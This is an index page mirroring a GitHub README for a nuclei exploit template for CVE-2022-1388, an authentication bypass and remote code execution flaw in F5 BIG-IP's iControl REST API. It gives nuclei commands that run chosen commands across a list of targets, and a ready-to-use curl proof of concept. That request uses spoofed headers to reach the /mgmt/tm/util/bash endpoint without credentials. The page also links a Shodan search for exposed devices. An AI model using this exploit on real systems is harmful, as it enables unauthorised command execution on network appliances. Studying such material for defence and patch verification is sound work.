Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/mrcl0wnlab/nuclei-template-exploit-f5-big-ip-icontrol-rest-auth-bypass-rce-command-parameter

CVE-2022-1388 is an authentication bypass vulnerability in the REST component of BIG-IP’s iControl API that was assigned a CVSSv3 score of 9.8. The iControl REST API is used for the management and configuration of BIG-IP devices. CVE-2022-1388 could be exploited by an unauthenticated attacker with network access to the management port or self IP addresses of devices that use BIG-IP. Exploitation would allow the attacker to execute arbitrary system commands, create and delete files and disable services.
https://github.com/mrcl0wnlab/nuclei-template-exploit-f5-big-ip-icontrol-rest-auth-bypass-rce-command-parameter

bigip bigip-rest-api cve-2022-1388 exploit f5-bigip nuclei nuclei-templates

Last synced: 17 days ago
JSON representation

CVE-2022-1388 is an authentication bypass vulnerability in the REST component of BIG-IP’s iControl API that was assigned a CVSSv3 score of 9.8. The iControl REST API is used for the management and configuration of BIG-IP devices. CVE-2022-1388 could be exploited by an unauthenticated attacker with network access to the management port or self IP addresses of devices that use BIG-IP. Exploitation would allow the attacker to execute arbitrary system commands, create and delete files and disable services.

Awesome Lists containing this project

README

        

# Nuclei Template Exploit F5 BIG-IP iControl REST Auth Bypass RCE | Command Parameter
CVE-2022-1388 is an authentication bypass vulnerability in the REST
component of BIG-IP’s iControl API that was assigned a CVSSv3
score of 9.8. The iControl REST API is used for the management and
configuration of BIG-IP devices. CVE-2022-1388 could be exploited
by an unauthenticated attacker with network access to the management
port or self IP addresses of devices that use BIG-IP. Exploitation would
allow the attacker to execute arbitrary system commands, create and
delete files and disable services.

## This template use token-spray / nuclei's CLI variable
This nuclei-template accepts shell parameter for exploitation.
We wanted to test tokens obtained from another workflow or a manual search, so we used nuclei's CLI variable feature to dynamically feed a single token value or list of tokens into these templates at run time

> `-V, -var value custom vars in var=value format`

```bash
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=commands.txt
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=uname -a
```
![Captura de tela de 2022-05-10 01-28-12](https://user-images.githubusercontent.com/17049332/167542872-e92763aa-1a46-48f5-9acd-54b150b37c50.png)

## POC Manual
```bash
curl -su admin \
-H "Host: localhost:8100" \
-H "Content-Type: application/json" \
-H "Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a" \
-H "Authorization: Basic YWRtaW46" \
http://{{TARGET_IP}}/mgmt/tm/util/bash \
-d '{"command":"run","utilCmdArgs":"-c id"}'
```

### Additional Details
- https://www.shodan.io/search?query=http.title%3A%22BIG-IP%26reg%3B-+Redirect%22

### References
- https://blog.projectdiscovery.io/nuclei-v2-5-release/
- https://clouddocs.f5.com/products/big-iq/mgmt-api/v5.4/ApiReferences/bigiq_api_ref/r_auth_login.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
- https://github.com/alt3kx/CVE-2022-1388_PoC
- https://github.com/dorkerdevil/CVE-2021-22986-Poc/blob/main/README.md
- https://github.com/horizon3ai/CVE-2022-1388/blob/main/CVE-2022-1388.py
- https://github.com/numanturle/CVE-2022-1388/blob/main/bigip-icontrol-rest-rce.y
- https://github.com/tenable/audit_files/tree/master/cve-2022-1388
- https://support.f5.com/csp/article/K23605346
- https://thehackernews.com/2022/05/f5-warns-of-new-critical-big-ip-remote.html
- https://twitter.com/1ZRR4H/status/1522165718975922178
- https://www.tenable.com/blog/cve-2022-1388-authentication-bypass-in-f5-big-ipaml